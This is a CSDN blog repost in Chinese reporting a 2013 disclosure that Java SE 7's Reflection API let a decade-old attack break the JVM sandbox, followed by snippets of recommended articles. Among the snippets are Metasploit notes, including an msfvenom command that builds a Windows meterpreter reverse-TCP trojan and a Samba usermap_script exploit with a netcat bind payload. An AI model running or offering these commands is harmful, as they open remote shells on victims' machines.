黑马程序员-Java7爆最新漏洞,10年前的攻击手法仍有效-转

最新推荐文章于 2022-03-28 16:47:03 发布
最新推荐文章于 2022-03-28 16:47:03 发布
阅读量703 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy_fly2015/article/details/9831303
版权

据SECLISTS透露,他们发现新的Reflection API在引进Java SE 7时并未经过非常安全的复查,并且存在着一个非常大的漏洞。

该漏洞可以允许黑客利用10年前便广为人知的手法来攻击Java虚拟机。Java SE 7中的Reflection API并未采取应有的保护机制来防堵该攻击。

SECLISTS 公司关于该漏洞的概念验证代码在Java SE 7 Update 25 (1.7.0_25-b16) 版本下成功利用了该漏洞。该代码可以侵入JVM安全方面的特性:类型系统安全性。这样,一个完整的、可依赖的Java安全沙盒分支便可以获得Java SE软件的一个漏洞实例。

Oracle公司在2013年5月曾发表博文称,要优先维护Java的安全性。而如今,Java频频爆出漏洞,这似乎也说明Oracle安全策略的制定和实施还不健全、不完善。

原文链接:http://seclists.org/fulldisclosure/2013/Jul/172

译文链接:http://www.oschina.net/news/42427/new-reflection-api-affected-by-a-known-10-years-old-attack

张勇的学习日志
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
失业第21天,Java开发十年,我得到了什么?到底该怎么做?
m0_58559010的博客
06-25 419
以前还会感慨“时间过得真快”,但是失业第21天,我对时间的流逝已经习以为常。 从小就熟知一个道理:浪费别人的时间等于谋财害命,浪费自己的时间等于慢性自杀。为了使自己的时间流失的有意义,我这里就进行一下简单的总结:Java开发十年,我得到了什么?到底该做什么? 忆往昔峥嵘岁月 我在计算机本科毕业后就进入了腾讯的QQ部门。 很荣幸接触到了当时可以说是顶尖的技术:在有限的宽带资源下达成接近一亿人的在线状态的互相同步。让用户登上PC端QQ后,他的好友能在一秒的延时内,接收到他上线的状态通知。 当时.
写了8年的代码,做过的项目都下线了
公众号-老炮说Java
10-20 265
作者:森林木链接:https://www.cnblogs.com/senlinmu/一、起因前几天项目交付上线,所以闲下来了。忽然想起来,自己业余接的活,有些项目已经不再运营了,所以想...
Java十多年了,我也不敢说“精通”
Java搜索工程技术栈
02-22 195
我从毕业做程序员就开始用 Java,到现在已经工作快 20 年了。减去我做手游用 C++、Lua 的几年,再减去后来管理写代码少的时间,我真正写 Java 代码的时间至少也在 10 年以上。 如果你问我“Java 已经精通了吗?”,说实话,还是有点心虚。 Java 博大精深,那么多知识点,肯定有我不懂的。另外,每个人对“精通”都有自己的理解,有人觉得是精于使用,有人觉得是精于底层原理,也有人觉得是精于框架。 但是,毕竟用 Java 十多年了,我可以说说我自己对“精通 Java”的理解。 Java
一个普通java程序员的10年...泪奔 o(╥﹏╥)o o(╥﹏╥)o
热门推荐
java1234的博客
05-31 17万+
大家好,我是曹尼玛,是一个很普通java程序员,今天看了下日期,眼间,毕业9年,工作10年了,经历比较多,受伤比较多,收获比较多,改变也很多,对未来也有一些规划,对java新人有一些中肯的建议… 过去10年的java人生回顾 人生回顾,酸甜苦辣,蛋定就好… 我的原生家庭和学业 本D 89年出生在沿海地区的一个普通农村家庭,一直供我上学,感恩父母! 上的是农村小学,乡镇初中,乡镇高中,学习成绩中上,加上教育一般,以及我智商一般,即使努力,也就考了个破本科,选了个不用拼爹的专业-计算机科学与技术。.
Java程序员已经饱和了?这是个老话题了
xiaoxijing的博客
08-24 755
这个是老话题了,Java程序员远远没有饱和,年薪10万+是很正常的一个薪酬水平。现在Java程序员挺多的,但是职位需求量更大,特别是能干实干或优秀的程序员是相当缺乏的,没存在饱和一说。 从经验来说,如果你是一位实干,又有强烈改变际遇的意志力的人,建议可以做Java技术开发,至少你的付出会有收获(技术领域内相对公平)! 近20年来Java程序员的工资一直是在稳中有升的状态,极端点的反例来说明,就算那些具有3~5年开发经验的中下水平(注意:中下,负能)的工程师,拥有年薪10万+是很正常的一个薪酬水平。 百度了
黑马程序员-Java语言进阶-源码、教程笔记.zip
12-16
day01_Object类、常用API day02_Collection、泛型 day03_List、Set、数据结构、Collections day04_Map,斗地主案例 day05_异常,线程 day06_线程、同步 day07_等待与唤醒案例、线程池、Lambda...Java基础小节练习题答案
黑马程序员-java多线程技术01
03-25
本教程将聚焦于Java中的多线程技术,以“黑马程序员-java多线程技术01”为学习起点,探讨如何在Java中实现并管理线程。 首先,我们来理解什么是线程。线程是操作系统分配CPU时间的基本单元,一个进程中可以有多个...
JAVA面试题》--JAVA 黑马程序员 面试宝典全学科.zip
最新发布
04-02
十余年JAVA从业经验,精通JAVA技术体系,有志于做JAVA技能提升的朋友可与我联系,交个朋友 十余年JAVA从业经验,精通JAVA技术体系,有志于做JAVA技能提升的朋友可与我联系,交个朋友 十余年JAVA从业经验,精通JAVA...
黑马程序员-java32期培训视频(基础+就业)
03-16
黑马程序员-java32期培训视频(基础+就业)黑马程序员-java32期培训视频(基础+就业)
黑马程序员 - Java基础教学 - 04 - 数组、进制换、二维数组
04-10
Java基础教学 - 数组、进制换、二维数组 在Java基础教学中,数组是一个非常重要的概念。数组是多个相同类型的变量组成的集合,每个变量被称为一个元素,数组中的每个元素都有自己的下标或索引。下面将详细讲解...
参加Java培训前景如何?程序员30岁会被裁吗?
qfxulei的博客
11-08 327
随着大学生越来越多,大学生的就业问题也越来越突出,就业形势相当严峻。得益于互联网行业的飞速发展,IT行业成为了当下大学生们比较喜欢的就业选择。然而,虽然互联网行业的岗位热门,但是也并不是那么好进入的。毕竟很多大学生并没与相应的技能,于是他们纷纷投培训机构的怀抱,期望自己能够在学习到技能后,去到IT行业找到一个高薪的工作。 很多人进入IT行业非常担心中年危机,其实你做到行业的顶尖,有别人没有的技能,自然不会被裁员,不过能学习这些技能本身就需要无比好的运气和自身不懈的努力。比如:...
一个五年Java程序员的现状,你甘心做一辈子码农吗?
weixin_46634368的博客
05-31 353
你愿意做码农吗? 恍然间,发现自己在这个行业里已经摸爬滚打了五年了,原以为自己就凭已有的项目经验和工作经历怎么着也应该算得上是一个业内比较资历的人士了,但是今年在换工作的过程中却遭到了重大的挫折。详细过程我就不再叙述,在此,只想给大家说一说被拒绝的原因,看看大家有没有相似的经历,和类似的感悟。 面试官对我的答复大致是这样的,我们不需要熟练工,我们需要在某领域拥有超过常人的积累认知,和拥有整套完整思维模式和优秀认知事物能力的人,他很诚恳地告诉我,你还年轻,真的应该好好地静下心来,深入地研究一些东西,自己写一些
Java7重大安全漏洞之对策
fisher_jiang的专栏
01-13 1万+
“根据美国计算机紧急响应小组(CERT)本月 10 日 (2013年 )发布的报告:Java 7 存在巨大的安全漏洞,美国国土安全局已经向所有用户发出建议,要求立即禁用 Java 7。”   The latest version of Java 7 (Update 10) includes a feature that makes it simpler to unplug Java from
Metasploit技术(一)——Metasploit简介与基础
Phantom03167的博客
03-28 9474
Metasploit简介与基础
Metasploit 攻击
新博客:https://aping-dev.com/
12-22 371
service postgresql start mfsconsole search samba use multi/samba/usermap_script show payloads set payloads cmd/unix/bind_netcat show options set rhost 10.10.10.254《Metasploit渗透魔鬼训练营》
Metaploit木马制作(无免杀毒)
04-14 1380
系统:kali,ip:192.168.43.16 所有需要输入的命令均在<     >中 打开终端; 使用<ifconfig>查看自己的ip 使用命令生成木马程序 <msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=192.16...
Metasploit 学习笔记
不急不躁
07-11 2万+
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql start service metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enable update-rc.d me
九年程序员生涯一些经验教训,九年磨一剑奥里给!
Connector_的博客
06-08 441
目录 1、与人交谈比与机器交谈更重要 2、了解你在做什么以及为什么这么做 3、如果代码审查让你倍感压力,这可不是个好事儿 4、防患于未然 5、别害怕让别人看到自己的一无所知 6、学会分享 几年不见,打工人你好! 流年似水,物是人非,不是么~​  我的编程之旅始于2012年,当时我还只是个C++编程实习生。说实话,我根本不知道自己在做什么。即使是到了现在,这种状况依然没有改变。不过,在这个过程中,我确实学到了很多东西。   问题来了:在程序员生涯中,你觉得什么语言最重要?   PHP?..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值